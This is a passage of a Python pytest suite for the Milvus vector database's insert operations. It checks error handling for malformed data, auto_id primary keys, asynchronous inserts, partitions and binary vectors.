target: test insert with non-dataframe, non-list data
method: insert with data (non-dataframe and non-list type)
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
error = {ct.err_code: 0, ct.err_msg: "Data type is not support"}
collection_w.insert(data=get_non_data_type, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("data", [[], pd.DataFrame()])
def test_insert_empty_data(self, data):
"""
target: test insert empty data
method: insert empty
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
error = {ct.err_code: 0, ct.err_msg: "The data fields number is not match with schema"}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_dataframe_only_columns(self):
"""
target: test insert with dataframe just columns
method: dataframe just have columns
expected: num entities is zero
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
columns = [ct.default_int64_field_name, ct.default_float_vec_field_name]
df = pd.DataFrame(columns=columns)
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_empty_field_name_dataframe(self):
"""
target: test insert empty field name df
method: dataframe with empty column
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(10)
df.rename(columns={ct.default_int64_field_name: ' '}, inplace=True)
error = {ct.err_code: 0, ct.err_msg: "The types of schema and data do not match"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_invalid_field_name_dataframe(self, get_invalid_field_name):
"""
target: test insert with invalid dataframe data
method: insert with invalid field name dataframe
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(10)
df.rename(columns={ct.default_int64_field_name: get_invalid_field_name}, inplace=True)
error = {ct.err_code: 0, ct.err_msg: "The types of schema and data do not match"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
def test_insert_dataframe_index(self):
"""
target: test insert dataframe with index
method: insert dataframe with index
expected: todo
"""
pass
@pytest.mark.tags(CaseLabel.L2)
def test_insert_none(self):
"""
target: test insert None
method: data is None
expected: return successfully with zero results
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
mutation_res, _ = collection_w.insert(data=None)
assert mutation_res.insert_count == 0
assert len(mutation_res.primary_keys) == 0
assert collection_w.is_empty
assert collection_w.num_entities == 0
@pytest.mark.tags(CaseLabel.L1)
def test_insert_numpy_data(self):
"""
target: test insert numpy.ndarray data
method: 1.create by schema 2.insert data
expected: assert num_entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_numpy_data(nb=10)
collection_w.insert(data=data)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_binary_dataframe(self):
"""
target: test insert binary dataframe
method: 1. create by schema 2. insert dataframe
expected: assert num_entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_data(self):
"""
target: test insert list-like binary data
method: 1. create by schema 2. insert data
expected: assert num_entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
data, _ = cf.gen_default_binary_list_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_single(self):
"""
target: test insert single
method: insert one entity
expected: verify num
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb=1)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == 1
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == 1
@pytest.mark.tags(CaseLabel.L2)
def test_insert_dim_not_match(self):
"""
target: test insert with not match dim
method: insert data dim not equal to schema dim
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
dim = 129
df = cf.gen_default_dataframe_data(ct.default_nb, dim=dim)
error = {ct.err_code: 1,
ct.err_msg: f'Collection field dim is {ct.default_dim}, but entities field dim is {dim}'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_dim_not_match(self):
"""
target: test insert binary with dim not match
method: insert binary data dim not equal to schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
dim = 120
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb, dim=dim)
error = {ct.err_code: 1,
ct.err_msg: f'Collection field dim is {ct.default_dim}, but entities field dim is {dim}'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_field_name_not_match(self):
"""
target: test insert field name not match
method: data field name not match schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(10)
df.rename(columns={ct.default_float_field_name: "int"}, inplace=True)
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_field_value_not_match(self):
"""
target: test insert with a field value type mismatch
method: insert data whose value type does not match the schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
df = cf.gen_default_dataframe_data(nb)
new_float_value = pd.Series(data=[float(i) for i in range(nb)], dtype="float64")
df.iloc[:, 1] = new_float_value
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_value_less(self):
"""
target: test insert with fewer int values than other fields
method: int field has fewer values than the vector field
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = [i for i in range(nb - 1)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = cf.gen_vectors(nb, ct.default_dim)
data = [int_values, float_values, float_vec_values]
error = {ct.err_code: 0, ct.err_msg: 'Arrays must all be same length.'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_vector_value_less(self):
"""
target: test insert with fewer vector values than other fields
method: vector field has fewer values than the int field
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = [i for i in range(nb)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = cf.gen_vectors(nb - 1, ct.default_dim)
data = [int_values, float_values, float_vec_values]
error = {ct.err_code: 0, ct.err_msg: 'Arrays must all be same length.'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_fields_more(self):
"""
target: test insert with more fields than the schema
method: data has more fields than the schema defines
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
new_values = [i for i in range(ct.default_nb)]
df.insert(3, 'new', new_values)
error = {ct.err_code: 0, ct.err_msg: 'The data fields number is not match with schema.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_fields_less(self):
"""
target: test insert with fewer fields than the schema
method: data has fewer fields than the schema defines
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
df.drop(ct.default_float_vec_field_name, axis=1, inplace=True)
error = {ct.err_code: 0, ct.err_msg: 'The data fields number is not match with schema.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_list_order_inconsistent_schema(self):
"""
target: test insert data fields order inconsistent with schema
method: insert list data, data fields order inconsistent with schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = [i for i in range(nb)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = cf.gen_vectors(nb, ct.default_dim)
data = [float_values, int_values, float_vec_values]
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_dataframe_order_inconsistent_schema(self):
"""
target: test insert with dataframe fields inconsistent with schema
method: insert dataframe, and fields order inconsistent with schema
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = pd.Series(data=[i for i in range(nb)])
float_values = pd.Series(data=[float(i) for i in range(nb)], dtype="float32")
float_vec_values = cf.gen_vectors(nb, ct.default_dim)
df = pd.DataFrame({
ct.default_float_field_name: float_values,
ct.default_float_vec_field_name: float_vec_values,
ct.default_int64_field_name: int_values
})
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_inconsistent_data(self):
"""
target: test insert with inconsistent data
method: insert data where the same column contains values of different types
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb=100)
data[0][1] = 1.0
error = {ct.err_code: 0, ct.err_msg: "The data in the same column must be of the same type"}
collection_w.insert(data, check_task=CheckTasks.err_res, check_items=error)
class TestInsertOperation(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert interface operations
******************************************************************
"""
@pytest.fixture(scope="function", params=[8, 4096])
def dim(self, request):
yield request.param
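# Parametrized fixture: tests that take `dim` run once with dim=8 and once with dim=4096.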
@pytest.mark.tags(CaseLabel.L2)
def test_insert_without_connection(self):
"""
target: test insert without connection
method: insert after remove connection
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
data = cf.gen_default_list_data(10)
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip("https://github.com/milvus-io/milvus/issues/12680")
@pytest.mark.parametrize("vec_fields", [[cf.gen_float_vec_field(name="float_vector1")],
[cf.gen_binary_vec_field()],
[cf.gen_binary_vec_field(), cf.gen_binary_vec_field("binary_vec")]])
def test_insert_multi_float_vec_fields(self, vec_fields):
"""
target: test insert into multi float vec fields collection
method: create collection with different schema and insert
expected: verify num entities
"""
schema = cf.gen_schema_multi_vector_fields(vec_fields)
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
df = cf.gen_dataframe_multi_vec_fields(vec_fields=vec_fields)
collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_drop_collection(self):
"""
target: test insert and drop
method: insert data and drop collection
expected: verify the collection no longer exists
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
collection_list, _ = self.utility_wrap.list_collections()
assert collection_w.name in collection_list
df = cf.gen_default_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
collection_w.drop()
collection_list, _ = self.utility_wrap.list_collections()
assert collection_w.name not in collection_list
@pytest.mark.tags(CaseLabel.L1)
def test_insert_create_index(self):
"""
target: test insert and create index
method: 1. insert 2. create index
expected: verify num entities and index
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_float_vec_field_name, default_index_params)
assert collection_w.indexes[0] == index
@pytest.mark.tags(CaseLabel.L1)
def test_insert_after_create_index(self):
"""
target: test insert after create index
method: 1. create index 2. insert data
expected: verify index and num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_float_vec_field_name, default_index_params)
assert collection_w.indexes[0] == index
df = cf.gen_default_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_binary_after_index(self):
"""
target: test insert binary after index
method: 1.create index 2.insert binary data
expected: 1.index ok 2.num entities correct
"""
schema = cf.gen_default_binary_collection_schema()
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
collection_w.create_index(ct.default_binary_vec_field_name, default_binary_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_binary_vec_field_name, default_binary_index_params)
assert collection_w.indexes[0] == index
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_create_index(self):
"""
target: test create index in auto_id=True collection
method: 1.create auto_id=True collection and insert
2.create index
expected: index correct
"""
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
df = cf.gen_default_dataframe_data()
df.drop(ct.default_int64_field_name, axis=1, inplace=True)
mutation_res, _ = collection_w.insert(data=df)
assert cf._check_primary_keys(mutation_res.primary_keys, ct.default_nb)
assert collection_w.num_entities == ct.default_nb
# create index
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_float_vec_field_name, default_index_params)
assert collection_w.indexes[0] == index
@pytest.mark.tags(CaseLabel.L2)
def test_insert_auto_id_true(self):
"""
target: test insert ids fields values when auto_id=True
method: 1.create collection with auto_id=True 2.insert without ids
expected: verify primary_keys and num_entities
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_default_dataframe_data()
df.drop(ct.default_int64_field_name, axis=1, inplace=True)
mutation_res, _ = collection_w.insert(data=df)
assert cf._check_primary_keys(mutation_res.primary_keys, ct.default_nb)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_twice_auto_id_true(self):
"""
target: test insert ids fields twice when auto_id=True
method: 1.create collection with auto_id=True 2.insert twice
expected: verify primary_keys unique
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
nb = 10
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_default_dataframe_data(nb)
df.drop(ct.default_int64_field_name, axis=1, inplace=True)
mutation_res, _ = collection_w.insert(data=df)
primary_keys = mutation_res.primary_keys
assert cf._check_primary_keys(primary_keys, nb)
mutation_res_1, _ = collection_w.insert(data=df)
primary_keys.extend(mutation_res_1.primary_keys)
assert cf._check_primary_keys(primary_keys, nb * 2)
assert collection_w.num_entities == nb * 2
@pytest.mark.tags(CaseLabel.L2)
def test_insert_auto_id_true_list_data(self):
"""
target: test insert ids fields values when auto_id=True
method: 1.create collection with auto_id=True 2.insert list data with ids field values
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
data = cf.gen_default_list_data()
mutation_res, _ = collection_w.insert(data=data[1:])
assert mutation_res.insert_count == ct.default_nb
assert cf._check_primary_keys(mutation_res.primary_keys, ct.default_nb)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_true_with_dataframe_values(self):
"""
target: test insert with auto_id=True
method: create collection with auto_id=True
expected: 1.verify num entities 2.verify ids
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_default_dataframe_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: 'Auto_id is True, primary field should not have data'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
assert collection_w.is_empty
@pytest.mark.tags(CaseLabel.L2)
def test_insert_auto_id_true_with_list_values(self):
"""
target: test insert with auto_id=True
method: create collection with auto_id=True
expected: 1.verify num entities 2.verify ids
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
data = cf.gen_default_list_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: 'The data fields number is not match with schema'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
assert collection_w.is_empty
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_false_same_values(self):
"""
target: test insert same ids with auto_id false
method: 1.create collection with auto_id=False 2.insert same int64 field values
expected: insert succeeds and primary keys equal the inserted (duplicate) values
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 100
data = cf.gen_default_list_data(nb=nb)
data[0] = [1 for i in range(nb)]
mutation_res, _ = collection_w.insert(data)
assert mutation_res.insert_count == nb
assert mutation_res.primary_keys == data[0]
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_false_negative_values(self):
"""
target: test insert negative ids with auto_id false
method: auto_id=False, primary field values are negative
expected: verify num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 100
data = cf.gen_default_list_data(nb)
data[0] = [i for i in range(0, -nb, -1)]
mutation_res, _ = collection_w.insert(data)
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="issue 15416")
def test_insert_multi_threading(self):
"""
target: test concurrent insert
method: multi threads insert
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(ct.default_nb)
thread_num = 4
threads = []
primary_keys = df[ct.default_int64_field_name].values.tolist()
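# Each thread inserts the same dataframe; the final assert expects ct.default_nb * thread_num entities.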
def insert(thread_i):
log.debug(f'In thread-{thread_i}')
mutation_res, _ = collection_w.insert(df)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == primary_keys
for i in range(thread_num):
x = threading.Thread(target=insert, args=(i,))
threads.append(x)
x.start()
for t in threads:
t.join()
assert collection_w.num_entities == ct.default_nb * thread_num
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason="Currently primary keys are not unique")
def test_insert_multi_threading_auto_id(self):
"""
target: test concurrent insert auto_id=True collection
method: 1.create auto_id=True collection 2.concurrent insert
expected: verify primary keys unique
"""
pass
@pytest.mark.tags(CaseLabel.L1)
def test_insert_multi_times(self, dim):
"""
target: test insert multi times
method: insert data multi times
expected: verify num entities
"""
step = 120
nb = 12000
collection_w = self.init_collection_general(prefix, dim=dim)[0]
for _ in range(nb // step):
df = cf.gen_default_dataframe_data(step, dim)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == step
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_all_datatype_collection(self):
"""
target: test insert into collection that contains all datatype fields
method: 1.create all datatype collection 2.insert data
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_dataframe_all_data_type(nb=nb)
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name)
assert self.collection_wrap.num_entities == nb
class TestInsertAsync(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert async
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_insert_sync(self):
"""
target: test async insert
method: insert with async=True
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
future, _ = collection_w.insert(data=df, _async=True)
future.done()
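# done() is called before result(); result() below returns the MutationResult once the async insert completes.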
mutation_res = future.result()
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_async_false(self):
"""
target: test insert with false async
method: async = false
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
mutation_res, _ = collection_w.insert(data=df, _async=False)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_async_callback(self):
"""
target: test insert with callback func
method: insert with callback func
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
future, _ = collection_w.insert(data=df, _async=True, _callback=assert_mutation_result)
future.done()
mutation_res = future.result()
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_long(self):
"""
target: test insert with async
method: insert 5w entities with callback func
expected: verify num entities
"""
nb = 50000
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb)
future, _ = collection_w.insert(data=df, _async=True)
future.done()
mutation_res = future.result()
assert mutation_res.insert_count == nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_callback_timeout(self):
"""
target: test insert async with callback
method: insert 10w entities with a very short timeout (0.2s)
expected: raise exception
"""
nb = 100000
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb)
future, _ = collection_w.insert(data=df, _async=True, _callback=None, timeout=0.2)
with pytest.raises(MilvusException):
future.result()
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_data(self):
"""
target: test insert async with invalid data
method: insert async with invalid data
expected: raise exception
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
columns = [ct.default_int64_field_name, ct.default_float_vec_field_name]
df = pd.DataFrame(columns=columns)
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
collection_w.insert(data=df, _async=True, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_partition(self):
"""
target: test insert async with invalid partition
method: insert async with invalid partition
expected: raise exception
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
err_msg = "partitionID of partitionName:p can not be find"
future, _ = collection_w.insert(data=df, partition_name="p", _async=True)
future.done()
with pytest.raises(MilvusException, match=err_msg):
future.result()
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_no_vectors_raise_exception(self):
"""
target: test insert with a schema lacking a vector field
method: build a schema with only the primary field and insert it into the collection
expected: raise exception
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_collection_schema([cf.gen_int64_field(is_primary=True)])
error = {ct.err_code: 0, ct.err_msg: "fleldSchema lack of vector field."}
future, _ = collection_w.insert(data=df, _async=True, check_task=CheckTasks.err_res, check_items=error)
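# Module-level helper passed as `_callback` to the async insert in test_insert_async_callback; it only checks the reported insert count.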
def assert_mutation_result(mutation_res):
assert mutation_res.insert_count == ct.default_nb
class TestInsertPartitionOperation(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert interface operations
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_insert_default_partition(self):
"""
target: test insert entities into default partition
method: create partition and insert into collection
expected: the collection insert count equals to nb
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
partition_w1 = self.init_partition_wrap(collection_w)
data = cf.gen_default_list_data(nb=ct.default_nb)
mutation_res, _ = collection_w.insert(data=data, partition_name=partition_w1.name)
assert mutation_res.insert_count == ct.default_nb
def test_insert_partition_not_existed(self):
"""
target: test insert entities into a previously created collection
method: create collection and insert entities into it with a partition_name that does not exist
expected: error raised
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb=ct.default_nb)
error = {ct.err_code: 1, ct.err_msg: "partitionID of partitionName:p can not be existed"}
mutation_res, _ = collection_w.insert(data=df, partition_name="p", check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_partition_repeatedly(self):
"""
target: test insert entities into a previously created collection
method: create collection and insert entities into it repeatedly, with the partition_name param
expected: each insert count equals nb
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
partition_w1 = self.init_partition_wrap(collection_w)
partition_w2 = self.init_partition_wrap(collection_w)
df = cf.gen_default_dataframe_data(nb=ct.default_nb)
mutation_res, _ = collection_w.insert(data=df, partition_name=partition_w1.name)
new_res, _ = collection_w.insert(data=df, partition_name=partition_w2.name)
assert mutation_res.insert_count == ct.default_nb
assert new_res.insert_count == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition_with_ids(self):
"""
target: test insert entities with ids into a previously created collection
method: create collection and insert entities into it with the partition_name param
expected: the insert count equals nb
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
partition_name = cf.gen_unique_str(prefix)
partition_w1 = self.init_partition_wrap(collection_w, partition_name=partition_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=df, partition_name=partition_w1.name)
assert mutation_res.insert_count == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_type_not_match(self):
"""
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_collection_schema_all_datatype
error = {ct.err_code: 0, ct.err_msg: "Data type is not support"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_lack_vector_field(self):
"""
target: test insert entities, with no vector field
method: remove entity values of vector field
expected: error raised
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_collection_schema([cf.gen_int64_field(is_primary=True)])
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_no_vector_field_dtype(self):
"""
target: test insert entities with an invalid vector field type
method: vector field dtype does not exist
expected: error raised
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
vec_field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.NONE)
field_one = cf.gen_int64_field(is_primary=True)
field_two = cf.gen_int64_field()
df = [field_one, field_two, vec_field]
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType."}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_no_vector_field_name(self):
"""
target: test insert entities with an invalid vector field name
method: vector field name is invalid
expected: error raised
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
vec_field = cf.gen_float_vec_field(name=ct.get_invalid_strs)
field_one = cf.gen_int64_field(is_primary=True)
field_two = cf.gen_int64_field()
df = [field_one, field_two, vec_field]
error = {ct.err_code: 0, ct.err_msg: "Data type is not support."}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
class TestInsertBinary(TestcaseBase):
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_partition(self):
"""
target: test insert entities and create partition
method: create collection and insert binary entities in it, with the partition_name param
expected: the collection row count equals to nb
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
partition_name = cf.gen_unique_str(prefix)
partition_w1 = self.init_partition_wrap(collection_w, partition_name=partition_name)
mutation_res, _ = collection_w.insert(data=df, partition_name=partition_w1.name)
assert mutation_res.insert_count == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_binary_multi_times(self):
"""
target: test insert entities multiple times and a final flush
method: create collection and insert binary entities multiple times
